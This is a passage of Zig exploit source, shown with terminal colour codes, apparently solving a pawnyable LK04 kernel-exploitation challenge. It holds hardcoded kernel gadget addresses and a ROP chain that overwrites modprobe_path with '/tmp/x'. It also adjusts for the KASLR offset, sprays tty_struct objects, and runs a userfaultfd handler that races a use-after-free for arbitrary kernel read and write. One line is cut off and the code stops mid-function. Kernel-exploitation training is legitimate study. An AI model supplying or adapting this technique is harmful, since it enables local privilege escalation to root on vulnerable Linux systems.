�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RAX�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff8125a664�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mPOP_RDI�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff812a7d7c�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81800e10�[0m�[1m�[36m+�[0m�[1m�[36m22�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81e37ea0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mchain�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mreadInt�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"/tmp/x�[0m�[33m\x00\x00�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlittle�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPOP_RAX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m// junk�[0m
�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmodprobePath�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_cs�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rflags�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_rsp�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37muser_ss�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mchain�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[36m*�[0m�[37m@sizeOf�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)],�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mchain�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mchain�[0m�[1m�[37m).�[0m�[1m�[37mlen�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mgadgets�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36m*�[0m�[1m�[36mu64�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMOV_ADDROF_RAX_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RAX�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mPOP_RDI�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mKPTI_TRAMPOLINE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mgadgets�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mg�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mg�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37mtypes�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mtty_struct�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37muserfaultfd�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk04�[0m�[1m�[36m-�[0m�[1m�[37mropchain�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mUAF�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mAAR�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mAAW�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37msprayFaultHandler�[0m�[1m�[37m(�[0m�[1m�[37muffd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muaf_type�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mUAF�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mpollfds�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mpollfd�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37muffd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mevents�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mIN�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mrevents�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mpoll�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mpollfds�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpollfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpollfds�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m];�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr_mask�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mERR�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mPOLL�[0m�[1m�[37m.�[0m�[1m�[37mHUP�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mpollfd�[0m�[1m�[37m.�[0m�[1m�[37mrevents�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m �[0m�[1m�[37merr_mask�[0m�[1m�[37m �[0m�[1m�[36m!=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"poll failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mmsg�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m.�[0m�[1m�[37mmsg�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mread�[0m�[1m�[37m(�[0m�[1m�[37muffd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mmsg�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"read failed"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mpagefault_event�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mmsg�[0m�[1m�[37m.�[0m�[1m�[37mevent�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPAGEFAULT�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37mmsg�[0m�[1m�[37m.�[0m�[1m�[37marg�[0m�[1m�[37m.�[0m�[1m�[37mpagefault�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"received non-pagefault event"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Beginning {s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[37m@tagName�[0m�[1m�[37m(�[0m�[1m�[37muaf_type�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37muaf_type�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAAR�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAAW�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// we want to overwrite the data at the address `heap_leak' with malicious tty_operations structures�[0m
�[1m�[37m �[0m�[33m// but we cannot simply SET the contents of the tty_struct that `heap_leak' points to�[0m
�[1m�[37m �[0m�[33m// instead, we will free the aforementioned tty_struct(s) and spray tty_operations (by adding blobs with contents of `buf'), hoping that one will be placed at `heap_leak'�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m100�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"blob_add failed with {any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mDEL�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"blob_del failed with {any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mttys�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|*�[0m�[1m�[37mtty�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtty�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/ptmx"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDONLY�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOCTTY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mufcopy�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m.�[0m�[1m�[37muffdio_copy�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdst�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpagefault_event�[0m�[1m�[37m.�[0m�[1m�[37maddress�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{},�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mcopy�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[0m...
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37muffd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37muserfaultfd�[0m�[1m�[37m.�[0m�[1m�[37mUFFDIO�[0m�[1m�[37m.�[0m�[1m�[37mCOPY�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mufcopy�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37merr�[0m�[1m�[37m(�[0m�[33m"{any}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37merr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexploit�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mttys�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m10�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m1024�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
